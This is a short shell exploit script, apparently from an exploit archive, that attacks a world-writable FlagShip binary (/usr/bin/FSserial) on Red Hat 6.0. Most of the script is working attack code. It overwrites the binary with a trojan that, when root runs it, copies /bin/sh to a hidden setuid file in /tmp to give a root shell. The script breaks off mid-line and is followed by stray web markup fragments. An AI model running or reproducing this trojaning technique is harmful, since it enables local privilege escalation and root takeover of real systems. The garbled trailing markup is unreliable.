#!/bin/sh
#
# Program Description:
# FlagShip (from Red Hat Application CD) is a Database Development System
# for xBase based applications on nearly all Unix brands.
#
# Problem:
# /usr/bin/FSserial is world-writeable! We can replace it with an
# trojan and trick root to execute it.
#
# System Vulnerable: Red Hat 6.0
#
# fi.sh (lame) (half)exploit by Narrow
if [ ! -f /usr/bin/FSserial ]; then
echo "Error: File /usr/bin/FSserial doesn't exist!";
exit 1
fi
if [ ! -w /usr/bin/FSserial ]; then
echo "Error: /usr/bin/FSserial not world writeable!";
exit 1
fi
echo -n "Backup of FSserial (/tmp/fs.bak) ... "
cp /usr/bin/FSserial /tmp/fs.bak
echo "OK"; echo
echo -n "Trojaning FSserial ... "
echo "#!/bin/sh" >/usr/bin/FSserial ; echo >>/usr/bin/FSserial
echo "echo File Damaged" >>/usr/bin/FSserial
echo "cp /bin/sh /tmp/.root.mail" >>/usr/bin/FSserial
echo "chmod 4755 /tmp/.root.mail" >>/usr/bin/FSserial
echo "OK"; echo
echo "FSserial is now trojaned. Now it's your turn to trick"
echo "root
# www.hack.co.za [27 September 2000]# |
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |